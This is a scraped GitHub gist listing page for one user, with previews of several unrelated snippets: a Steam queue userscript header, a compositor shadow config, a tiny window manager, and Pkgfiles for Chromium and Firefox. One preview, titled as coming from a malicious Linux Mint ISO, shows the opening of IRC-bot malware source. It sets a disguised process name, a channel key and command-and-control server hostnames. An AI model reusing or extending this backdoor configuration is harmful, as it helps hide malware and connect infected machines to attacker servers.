Skip to content

Instantly share code, notes, and snippets.

View user's full-sized avatar
👽
ayy lmao

Ilya Solovyov user

👽
ayy lmao
  • Saint Petersburg, Russia
  • 15:10 (UTC +03:00)
View GitHub Profile
@user
user / steam_quick_queue.user.js
Created December 22, 2022 18:40 — forked from xPaw/steam_quick_queue.user.js
⚠ This script has been integrated into SteamDB browser extension!
// ==UserScript==
// @name Steam Queue Auto Discoverer
// @description Discover the Steam queue three times to get the sale cards
// @version 2.3.0
// @namespace https://gist.github.com/xPaw/73f8ae2031b4e528abf7
// @icon https://store.steampowered.com/favicon.ico
// @match https://store.steampowered.com/explore*
// @grant none
// ==/UserScript==
# Shadow
shadow = true; # Enabled client-side shadows on windows.
no-dock-shadow = true; # Avoid drawing shadows on dock/panel windows.
no-dnd-shadow = true; # Don't draw shadows on DND windows.
clear-shadow = true; # Zero the part of the shadow's mask behind the window (experimental).
shadow-radius = 15; # The blur radius for shadows. (default 12)
shadow-offset-x = -25; # The left offset for shadows. (default -15)
shadow-offset-y = -3; # The top offset for shadows. (default -15)
shadow-opacity = 0.5; # The translucency for shadows. (default .75)
# shadow-red = 0.0; # Red color value of shadow. (0.0 - 1.0, defaults to 0)
@user
user / man.cy
Created February 21, 2016 20:13 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
/* TinyWM is written by Nick Welch <mack@incise.org>, 2005.
* TinyWM-XCB is rewritten by Ping-Hsun Chen <penkia@gmail.com>, 2010
*
* This software is in the public domain
* and is provided AS IS, with NO WARRANTY. */
#include <xcb/xcb.h>
int main (int argc, char **argv)
{
@user
user / Pkgfile-chromium
Last active January 26, 2018 12:01
Pkgfile
name=chromium
version=63.0.3239.132
release=1
source=(https://commondatastorage.googleapis.com/$name-browser-official/$name-$version.tar.xz
last-commit-position.patch $name.sh
chromium-exclude_unwind_tables.patch
chromium-clang-r1.patch
chromium-webrtc-r0.patch)
build() {
@user
user / Pkgfile-firefox
Last active January 25, 2018 06:54
Pkgfile
name=firefox
version=52.6.0esr
release=1
source=(https://ftp.mozilla.org/pub/firefox/releases/$version/source/firefox-$version.source.tar.xz
firefox-install-dir.patch firefox.desktop)
build() {
cd firefox-$version
sed -i '/^ftfntfmt.h/ i freetype/ftfntfmt.h' config/system-headers